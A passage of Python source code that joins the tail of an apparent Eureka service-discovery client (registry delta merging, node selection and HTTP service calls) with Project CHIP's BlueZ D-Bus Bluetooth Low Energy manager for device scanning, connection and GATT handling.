self.__delta is not None
and delta.versionsDelta == self.__delta.versionsDelta
and delta.appsHashcode == self.__delta.appsHashcode
):
return
self.__merge_delta(delta)
self.__delta = delta
if not self.__is_hash_match():
self.__pull_full_registry()
try:
self.__connect_to_eureka_server(do_fetch)
except Exception as e:
_logger.warn("fetch delta from eureka server error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_DISCOVER, e)
def __is_hash_match(self):
app_hash = self.__get_applications_hash()
_logger.debug(
f"check hash, local[{app_hash}], remote[{self.__delta.appsHashcode}]"
)
return app_hash == self.__delta.appsHashcode
def __merge_delta(self, delta):
_logger.debug(
f"merge delta...length of application got from delta::{len(delta.applications)}"
)
for application in delta.applications:
for instance in application.instances:
_logger.debug(
f"instance [{instance.instanceId}] has {instance.actionType}"
)
if instance.actionType in (
constants.ActionType.ACTION_TYPE_ADDED,
constants.ActionType.ACTION_TYPE_MODIFIED,
):
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.update_instance(instance)
elif instance.actionType == constants.ActionType.ACTION_TYPE_DELETED:
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
existingApp.remove_instance(instance)
def __get_applications_hash(self):
app_hash = ""
app_status_count = {}
for application in self.__applications.applications:
for instance in application.instances:
if instance.status not in app_status_count:
app_status_count[instance.status.upper()] = 0
app_status_count[instance.status.upper()] = (
app_status_count[instance.status.upper()] + 1
)
sorted_app_status_count = sorted(
app_status_count.items(), key=lambda item: item[0]
)
for item in sorted_app_status_count:
app_hash = f"{app_hash}{item[0]}_{item[1]}_"
return app_hash
def walk_nodes_async(
self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
on_success: Callable = None,
on_error: Callable = None,
) -> None:
def async_thread_target():
try:
res = self.walk_nodes(
app_name=app_name,
service=service,
prefer_ip=prefer_ip,
prefer_https=prefer_https,
walker=walker,
)
if on_success is not None and (
inspect.isfunction(on_success) or inspect.ismethod(on_success)
):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (
inspect.isfunction(on_error) or inspect.ismethod(on_error)
):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def walk_nodes(
self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
) -> Union[str, Dict, http_client.HTTPResponse]:
assert (
app_name is not None and app_name != ""
), "application_name should not be null"
assert inspect.isfunction(walker) or inspect.ismethod(
walker
), "walker must be a method or function"
error_nodes = []
app_name = app_name.upper()
node = self.__get_available_service(app_name)
while node is not None:
try:
url = self.__generate_service_url(node, prefer_ip, prefer_https)
if service.startswith("/"):
url = url + service[1:]
else:
url = url + service
_logger.debug("do service with url::" + url)
return walker(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(
f"do service {service} in node [{node.instanceId}] error, use next node."
)
error_nodes.append(node.instanceId)
node = self.__get_available_service(app_name, error_nodes)
raise http_client.URLError("Try all up instances in registry, but all fail")
def do_service_async(
self,
app_name: str = "",
service: str = "",
return_type: str = "string",
prefer_ip: bool = False,
prefer_https: bool = False,
on_success: Callable = None,
on_error: Callable = None,
method: str = "GET",
headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None,
timeout: float = constants.Constant.DEFAULT_TIME_OUT,
cafile: str = None,
capath: str = None,
cadefault: bool = False,
context: ssl.SSLContext = None,
) -> None:
def async_thread_target():
try:
res = self.do_service(
app_name=app_name,
service=service,
return_type=return_type,
prefer_ip=prefer_ip,
prefer_https=prefer_https,
method=method,
headers=headers,
data=data,
timeout=timeout,
cafile=cafile,
capath=capath,
cadefault=cadefault,
context=context,
)
if on_success is not None and (
inspect.isfunction(on_success) or inspect.ismethod(on_success)
):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (
inspect.isfunction(on_error) or inspect.ismethod(on_error)
):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def do_service(
self,
app_name: str = "",
service: str = "",
return_type: str = "string",
prefer_ip: bool = False,
prefer_https: bool = False,
method: str = "GET",
headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None,
timeout: float = constants.Constant.DEFAULT_TIME_OUT,
cafile: str = None,
capath: str = None,
cadefault: bool = False,
context: ssl.SSLContext = None,
) -> Union[str, Dict, http_client.HTTPResponse]:
_data: bytes
if data and isinstance(data, dict):
_data = json.dumps(data).encode()
elif data and isinstance(data, str):
_data = data.encode()
else:
_data = data
def walk_using_urllib(url):
req = http_client.Request(url, method=method)
heads = headers if headers is not None else {}
for k, v in heads.items():
req.add_header(k, v)
res_txt, res = http_client.load(
req,
data=_data,
timeout=timeout,
cafile=cafile,
capath=capath,
cadefault=cadefault,
context=context,
)
if return_type.lower() in ("json", "dict", "dictionary"):
return json.loads(res_txt)
elif return_type.lower() == "response_object":
return res
else:
return res_txt
return self.walk_nodes(
app_name, service, prefer_ip, prefer_https, walk_using_urllib
)
def __get_service_not_in_ignore_list(self, instances, ignores):
ign = ignores if ignores else []
return [item for item in instances if item.instanceId not in ign]
def __get_available_service(self, application_name, ignore_instance_ids=None):
apps = self.applications
if not apps:
raise exceptions.DiscoverException(
"Cannot load registry from eureka server, please check your configurations. "
)
app = apps.get_application(application_name)
if app is None:
return None
up_instances = []
if self.__prefer_same_zone:
ups_same_zone = app.up_instances_in_zone(self.zone)
up_instances = self.__get_service_not_in_ignore_list(
ups_same_zone, ignore_instance_ids
)
if not up_instances:
ups_not_same_zone = app.up_instances_not_in_zone(self.zone)
_logger.debug(
f"app[{application_name}]'s up instances not in same zone are all down, using the one that's not in the same zone: {[ins.instanceId for ins in ups_not_same_zone]}"
)
up_instances = self.__get_service_not_in_ignore_list(
ups_not_same_zone, ignore_instance_ids
)
else:
up_instances = self.__get_service_not_in_ignore_list(
app.up_instances, ignore_instance_ids
)
if len(up_instances) == 0:
# no up instances
return None
elif len(up_instances) == 1:
# only one available instance, then doesn't matter which strategy is.
instance = up_instances[0]
self.__ha_cache[application_name] = instance.instanceId
return instance
def random_one(instances):
if len(instances) == 1:
idx = 0
else:
idx = random.randint(0, len(instances) - 1)
selected_instance = instances[idx]
self.__ha_cache[application_name] = selected_instance.instanceId
return selected_instance
if self.__ha_strategy == constants.HAStrategy.HA_STRATEGY_RANDOM:
return random_one(up_instances)
elif self.__ha_strategy == constants.HAStrategy.HA_STRATEGY_STICK:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
cahce_instance = app.get_instance(cache_id)
if (
cahce_instance is not None
and cahce_instance.status
== constants.InstanceStatus.INSTANCE_STATUS_UP
):
return cahce_instance
else:
return random_one(up_instances)
else:
return random_one(up_instances)
elif self.__ha_strategy == constants.HAStrategy.HA_STRATEGY_OTHER:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
other_instances = []
for up_instance in up_instances:
if up_instance.instanceId != cache_id:
other_instances.append(up_instance)
return random_one(other_instances)
else:
return random_one(up_instances)
else:
return None
def __generate_service_url(self, instance, prefer_ip, prefer_https) -> str:
if instance is None:
raise exceptions.InstanceDoesNotExistError(
instance,
"Could not generate service URL, since instance does not exist!",
)
schema = "http"
port = 0
if instance.port.port and not instance.securePort.enabled:
schema = "http"
port = instance.port.port
elif not instance.port.port and instance.securePort.enabled:
schema = "https"
port = instance.securePort.port
elif instance.port.port and instance.securePort.enabled:
if prefer_https:
schema = "https"
port = instance.securePort.port
else:
schema = "http"
port = instance.port.port
else:
assert False, "generate_service_url error: No port is available"
host = instance.ipAddr if prefer_ip else instance.hostName
return f"{schema}://{host}:{port}/"
def __start_discover(self):
self.__pull_full_registry()
def start(self) -> None:
if self.should_register:
self.__start_register()
if self.should_discover:
self.__start_discover()
self.__heartbeat_timer.start()
def stop(self) -> None:
if self.__heartbeat_timer.is_alive():
self.__heartbeat_timer.cancel()
if self.__should_register:
self.__stop_registery()
|
ChipBluezMgr.py
|
#
# Copyright (c) 2020 Project CHIP Authors
# Copyright (c) 2019-2020 Google LLC.
# Copyright (c) 2015-2018 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# BLE Central support for Chip Device Manager via BlueZ APIs.
#
from __future__ import absolute_import
from __future__ import print_function
import dbus
import dbus.service
import dbus.mainloop.glib
import logging
import sys
import threading
import time
import traceback
import uuid
import queue
from ctypes import *
try:
from gi.repository import GObject
except Exception as ex:
logging.exception("Unable to find GObject from gi.repository")
from pgi.repository import GObject
from .ChipBleUtility import (
BLE_ERROR_REMOTE_DEVICE_DISCONNECTED,
BleDisconnectEvent,
ParseServiceData,
)
from .ChipBleBase import ChipBleBase
chip_service = uuid.UUID("0000FFF6-0000-1000-8000-00805F9B34FB")
chip_tx = uuid.UUID("18EE2EF5-263D-4559-959F-4F9C429F9D11")
chip_rx = uuid.UUID("18EE2EF5-263D-4559-959F-4F9C429F9D12")
chip_service_short = uuid.UUID("0000FFF6-0000-0000-0000-000000000000")
chromecast_setup_service = uuid.UUID("0000FEA0-0000-1000-8000-00805F9B34FB")
chromecast_setup_service_short = uuid.UUID(
"0000FEA0-0000-0000-0000-000000000000")
BLUEZ_NAME = "org.bluez"
ADAPTER_INTERFACE = BLUEZ_NAME + ".Adapter1"
DEVICE_INTERFACE = BLUEZ_NAME + ".Device1"
SERVICE_INTERFACE = BLUEZ_NAME + ".GattService1"
CHARACTERISTIC_INTERFACE = BLUEZ_NAME + ".GattCharacteristic1"
DBUS_PROPERTIES = "org.freedesktop.DBus.Properties"
BLE_SCAN_CONNECT_GUARD_SEC = 2.0
BLE_STATUS_TRANSITION_TIMEOUT_SEC = 5.0
BLE_CONNECT_TIMEOUT_SEC = 15.0
BLE_SERVICE_DISCOVERY_TIMEOUT_SEC = 5.0
BLE_CHAR_DISCOVERY_TIMEOUT_SEC = 5.0
BLE_SUBSCRIBE_TIMEOUT_SEC = 5.0
BLE_WRITE_CHARACTERISTIC_TIMEOUT_SEC = 10.0
BLE_IDLE_DELTA = 0.1
def get_bluez_objects(bluez, bus, interface, prefix_path):
results = []
if bluez is None or bus is None or interface is None or prefix_path is None:
return results
for item in bluez.GetManagedObjects().items():
delegates = item[1].get(interface)
if not delegates:
continue
slice = {}
if item[0].startswith(prefix_path):
slice["object"] = bus.get_object(BLUEZ_NAME, item[0])
slice["path"] = item[0]
results.append(slice)
return results
class BluezDbusAdapter:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.adapter = dbus.Interface(bluez_obj, ADAPTER_INTERFACE)
self.adapter_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.adapter_event = threading.Event()
self.bluez = bluez
self.bus = bus
self.path = self.adapter.object_path
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy adapter")
self.adapter_unregister_signal()
self.adapter = None
self.adapter_properties = None
self.adapter_event.clear()
self.bluez = None
self.bus = None
self.object = None
self.path = None
self.signalReceiver = None
def adapter_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add adapter signal")
self.signalReceiver = self.bus.add_signal_receiver(
self.adapter_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path,
)
def adapter_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug(" remove adapter signal")
self.bus.remove_signal_receiver(
self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface="org.freedesktop.DBus.Properties",
)
def adapter_on_prop_changed_cb(
self, interface, changed_properties, invalidated_properties
):
if len(changed_properties) == 0:
self.logger.debug("changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug(
"invalidated_properties is not empty %s" % str(
invalidated_properties)
)
return
if interface == ADAPTER_INTERFACE:
if "Discovering" in changed_properties:
self.adapter_event.set()
def adapter_bg_scan(self, enable):
self.adapter_event.clear()
action_flag = False
try:
if enable:
if not self.Discovering:
action_flag = True
self.logger.info("scanning started")
self.adapter.StartDiscovery()
else:
self.logger.info("it has started scanning")
else:
if self.Discovering:
action_flag = True
self.adapter.StopDiscovery()
self.logger.info("scanning stopped")
else:
print("it has stopped scanning")
if action_flag:
if not self.adapter_event.wait(BLE_STATUS_TRANSITION_TIMEOUT_SEC):
if enable:
self.logger.debug("scan start error")
else:
self.logger.debug("scan stop error")
self.adapter_event.clear()
except dbus.exceptions.DBusException as ex:
self.adapter_event.clear()
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def Address(self):
try:
result = self.adapter_properties.Get(ADAPTER_INTERFACE, "Address")
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def UUIDs(self):
try:
return self.adapter_properties.Get(ADAPTER_INTERFACE, "UUIDs")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
def SetDiscoveryFilter(self, dict):
try:
self.adapter.SetDiscoveryFilter(dict)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def Discovering(self):
try:
result = self.adapter_properties.Get(
ADAPTER_INTERFACE, "Discovering")
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
def DiscoverableTimeout(self, timeoutSec):
try:
result = self.adapter_properties.Set(
ADAPTER_INTERFACE, "DiscoverableTimeout", timeoutSec
)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
def Powered(self, enable):
try:
result = self.adapter_properties.Set(
ADAPTER_INTERFACE, "Powered", enable)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
def find_devices(self, uuids):
devices = [
BluezDbusDevice(p["object"], self.bluez, self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, DEVICE_INTERFACE, self.path
)
]
found = []
for device in devices:
for i in device.uuids:
if i in uuids:
found.append(device)
break
# Some devices do not advertise their uuid lists, thus we should also check service data.
if device.ServiceData:
for i in device.ServiceData:
if uuid.UUID(str(i)) in uuids:
found.append(device)
break
return found
def clear_adapter(self):
devices = [
BluezDbusDevice(p["object"], self.bluez, self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, DEVICE_INTERFACE, self.path
)
]
for device in devices:
try:
if device.Connected:
device.device_bg_connect(False)
self.adapter.RemoveDevice(device.device.object_path)
except Exception as ex:
pass
class BluezDbusDevice:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.device = dbus.Interface(bluez_obj, DEVICE_INTERFACE)
self.device_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.path = self.device.object_path
self.device_event = threading.Event()
if self.Name:
try:
self.device_id = uuid.uuid3(uuid.NAMESPACE_DNS, self.Name)
except UnicodeDecodeError:
self.device_id = uuid.uuid3(
uuid.NAMESPACE_DNS, self.Name.encode("utf-8")
)
else:
self.device_id = uuid.uuid4()
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
self.path = self.device.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy device")
self.device_unregister_signal()
self.device = None
self.device_properties = None
self.device_event = None
self.device_id = None
self.bluez = None
self.bus = None
self.object = None
self.signalReceiver = None
def device_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add device signal")
self.signalReceiver = self.bus.add_signal_receiver(
self.device_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path,
)
def device_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug("remove device signal")
self.bus.remove_signal_receiver(
self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES,
)
def device_on_prop_changed_cb(
self, interface, changed_properties, invalidated_properties
):
if len(changed_properties) == 0:
self.logger.debug("changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug(
"invalidated_properties is not empty %s" % str(
invalidated_properties)
)
return
if interface == DEVICE_INTERFACE:
if "Connected" in changed_properties:
self.device_event.set()
def device_bg_connect(self, enable):
time.sleep(BLE_SCAN_CONNECT_GUARD_SEC)
action_flag = False
self.device_event.clear()
try:
if enable:
if not self.Connected:
action_flag = True
self.device.Connect()
self.logger.info("BLE connecting")
else:
self.logger.info("BLE has connected")
else:
if self.Connected:
action_flag = True
self.device.Disconnect()
self.logger.info("BLE disconnected")
else:
self.logger.info("BLE has disconnected")
if action_flag:
if not self.device_event.wait(BLE_STATUS_TRANSITION_TIMEOUT_SEC):
if enable:
self.logger.info("BLE connect error")
else:
self.logger.info("BLE disconnect error")
self.device_event.clear()
except dbus.exceptions.DBusException as ex:
self.device_event.clear()
self.logger.info(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
def service_discover(self, gatt_dic):
self.logger.info("Discovering services")
try:
expired = time.time() + BLE_SERVICE_DISCOVERY_TIMEOUT_SEC
while time.time() < expired:
if self.ServicesResolved:
services = [
BluezDbusGattService(
p["object"], self.bluez, self.bus, self.logger
)
for p in get_bluez_objects(
self.bluez, self.bus, SERVICE_INTERFACE, self.path
)
]
for service in services:
if service.uuid in gatt_dic["services"]:
self.logger.info("Service discovering success")
return service
time.sleep(BLE_IDLE_DELTA)
self.logger.error("Service discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def uuids(self):
try:
uuids = self.device_properties.Get(DEVICE_INTERFACE, "UUIDs")
uuid_result = []
for i in uuids:
if len(str(i)) == 4:
uuid_normal = "0000%s-0000-0000-0000-000000000000" % i
else:
uuid_normal = i
uuid_result.append(uuid.UUID(str(uuid_normal)))
return uuid_result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Address(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "Address")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Name(self):
try:
name = self.device_properties.Get(DEVICE_INTERFACE, "Name")
return name
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Connected(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, "Connected")
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
@property
def TxPower(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "TxPower")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def RSSI(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, "RSSI")
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Adapter(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "Adapter")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def ServiceData(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "ServiceData")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def ServicesResolved(self):
try:
result = self.device_properties.Get(
DEVICE_INTERFACE, "ServicesResolved")
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
class BluezDbusGattService:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.service = dbus.Interface(bluez_obj, SERVICE_INTERFACE)
self.service_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.bluez = bluez
self.bus = bus
self.path = self.service.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattService")
self.service = None
self.service_properties = None
self.bluez = None
self.bus = None
self.object = None
self.path = None
@property
def uuid(self):
try:
result = uuid.UUID(
str(self.service_properties.Get(SERVICE_INTERFACE, "UUID"))
)
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Primary(self):
try:
result = bool(self.service_properties.Get(
SERVICE_INTERFACE, "Primary"))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
@property
def Device(self):
try:
result = self.service_properties.Get(SERVICE_INTERFACE, "Device")
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
def find_characteristic(self, uuid):
try:
expired = time.time() + BLE_CHAR_DISCOVERY_TIMEOUT_SEC
while time.time() < expired:
characteristics = [
BluezDbusGattCharacteristic(
p["object"], self.bluez, self.bus, self.logger
)
for p in get_bluez_objects(
self.bluez, self.bus, CHARACTERISTIC_INTERFACE, self.path
)
]
for characteristic in characteristics:
if characteristic.uuid == uuid:
return characteristic
time.sleep(BLE_IDLE_DELTA)
self.logger.error("Char discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
class BluezDbusGattCharacteristic:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.characteristic = dbus.Interface(
bluez_obj, CHARACTERISTIC_INTERFACE)
self.characteristic_properties = dbus.Interface(
bluez_obj, DBUS_PROPERTIES)
self.received = None
self.path = self.characteristic.object_path
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattCharacteristic")
self.gattCharacteristic_unregister_signal()
self.characteristic = None
self.object = None
self.characteristic_properties = None
self.received = None
self.bluez = None
self.bus = None
self.path = None
self.signalReceiver = None
def gattCharacteristic_register_signal(self):
if not self.signalReceiver:
self.logger.debug("add GattCharacteristic signal")
self.signalReceiver = self.bus.add_signal_receiver(
self.gatt_on_characteristic_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path,
)
def gattCharacteristic_unregister_signal(self):
if self.signalReceiver:
self.logger.debug("remove GattCharacteristic signal")
self.bus.remove_signal_receiver(
self.signalReceiver,
bus_name=BLUEZ_NAME,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES,
path=self.path,
)
self.signalReceiver = None
def gatt_on_characteristic_changed_cb(
self, interface, changed_properties, invalidated_properties
):
self.logger.debug(
"property change in" +
str(self.characteristic) + str(changed_properties)
)
if len(changed_properties) == 0:
return
if len(invalidated_properties) > 0:
return
if interface == CHARACTERISTIC_INTERFACE:
if "Value" in changed_properties:
if self.received:
self.received(changed_properties["Value"])
def WriteValue(self, value, options, reply_handler, error_handler, timeout):
try:
self.characteristic.WriteValue(
value,
options,
reply_handler=reply_handler,
error_handler=error_handler,
timeout=timeout,
)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def uuid(self):
try:
result = uuid.UUID(
str(
self.characteristic_properties.Get(
CHARACTERISTIC_INTERFACE, "UUID")
)
)
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
def StartNotify(self, cbfunct, reply_handler, error_handler, timeout):
try:
if not cbfunct:
self.logger.info("please provide the notify callback function")
self.received = cbfunct
self.gattCharacteristic_register_signal()
self.characteristic.StartNotify(
reply_handler=reply_handler,
error_handler=error_handler,
timeout=timeout,
)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
def StopNotify(self, reply_handler, error_handler, timeout):
try:
self.logger.debug("stopping notifying")
self.characteristic.StopNotify(
reply_handler=reply_handler,
error_handler=error_handler,
timeout=timeout,
)
self.gattCharacteristic_unregister_signal()
self.received = None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def Notifying(self):
try:
result = self.characteristic_properties.Get(
CHARACTERISTIC_INTERFACE, "Notifying"
)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
class BluezManager(ChipBleBase):
def __init__(self, devMgr, logger=None):
if logger:
self.logger = logger
else:
self.logger = logging.getLogger("ChipBLEMgr")
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s",
)
self.scan_quiet = False
self.peripheral_list = []
self.device_uuid_list = []
self.chip_queue = queue.Queue()
self.Gmainloop = None
self.daemon_thread = None
self.adapter = None
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
GObject.threads_init()
dbus.mainloop.glib.threads_init()
self.bus = dbus.SystemBus()
self.bluez = dbus.Interface(
self.bus.get_object(
BLUEZ_NAME, "/"), "org.freedesktop.DBus.ObjectManager"
)
self.target = None
self.service = None
self.orig_input_hook = None
self.hookFuncPtr = None
self.connect_state = False
self.tx = None
self.rx = None
self.setInputHook(self.readlineCB)
self.devMgr = devMgr
self.devMgr.SetBlockingCB(self.devMgrCB)
def __del__(self):
self.disconnect()
self.setInputHook(self.orig_input_hook)
def ble_adapter_select(self, identifier=None):
if self.adapter:
self.adapter.destroy()
self.adapter = None
self.adapter = self.get_adapter_by_addr(identifier)
self.adapter.adapter_register_signal()
self.adapter.Powered(False)
self.adapter.Powered(True)
def get_adapters(self):
return [
BluezDbusAdapter(p["object"], self.bluez, self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, ADAPTER_INTERFACE, "/org/bluez"
)
]
def ble_adapter_print(self):
try:
adapters = [
BluezDbusAdapter(p["object"], self.bluez,
self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, ADAPTER_INTERFACE, "/org/bluez"
)
]
for i in range(len(adapters)):
self.logger.info("AdapterName: %s AdapterAddress: %s" % (
adapters[i].path.replace("/org/bluez/", ""), adapters[i].Address))
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def get_adapter_by_addr(self, identifier):
try:
adapters = [
BluezDbusAdapter(p["object"], self.bluez,
self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, ADAPTER_INTERFACE, "/org/bluez"
)
]
if identifier is None:
return adapters[0]
if len(adapters) > 0:
for adapter in adapters:
if str(adapter.Address).upper() == str(identifier).upper() or "/org/bluez/{}".format(identifier) == str(adapter.path):
return adapter
self.logger.info(
"adapter %s cannot be found, expect the ble mac address" % (
identifier)
)
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def runLoopUntil(self, target=None, **kwargs):
if target:
self.daemon_thread = threading.Thread(
target=self.running_thread, args=(target, kwargs)
)
self.daemon_thread.daemon = True
self.daemon_thread.start()
try:
self.Gmainloop = GObject.MainLoop()
self.Gmainloop.run()
except KeyboardInterrupt:
self.Gmainloop.quit()
sys.exit(1)
def running_thread(self, target, kwargs):
try:
while not self.Gmainloop or not self.Gmainloop.is_running():
time.sleep(0.00001)
target(**kwargs)
except Exception as err:
traceback.print_exc()
finally:
self.Gmainloop.quit()
def setInputHook(self, hookFunc):
"""Set the PyOS_InputHook to call the specific function."""
hookFunctionType = CFUNCTYPE(None)
self.hookFuncPtr = hookFunctionType(hookFunc)
pyos_inputhook_ptr = c_void_p.in_dll(pythonapi, "PyOS_InputHook")
# save the original so that on del we can revert it back to the way it was.
self.orig_input_hook = cast(
pyos_inputhook_ptr.value, PYFUNCTYPE(c_int))
# set the new hook. readLine will call this periodically as it polls for input.
pyos_inputhook_ptr.value = cast(self.hookFuncPtr, c_void_p).value
def runIdleLoop(self, **kwargs):
time.sleep(0)
def devMgrCB(self):
self.runLoopUntil(self.runIdleLoop)
def readlineCB(self):
self.runLoopUntil(self.runIdleLoop)
if self.orig_input_hook:
self.orig_input_hook()
def dump_scan_result(self, device):
self.logger.info("{0:<16}= {1}".format("Name", device.Name))
self.logger.info("{0:<16}= {1}".format("ID", device.device_id))
self.logger.info("{0:<16}= {1}".format("RSSI", device.RSSI))
self.logger.info("{0:<16}= {1}".format("Address", device.Address))
devIdInfo = self.get_peripheral_devIdInfo(device)
if devIdInfo != None:
self.logger.info("{0:<16}= {1}".format(
"Pairing State", devIdInfo.pairingState))
self.logger.info("{0:<16}= {1}".format(
"Discriminator", devIdInfo.discriminator))
self.logger.info("{0:<16}= {1}".format(
"Vendor Id", devIdInfo.vendorId))
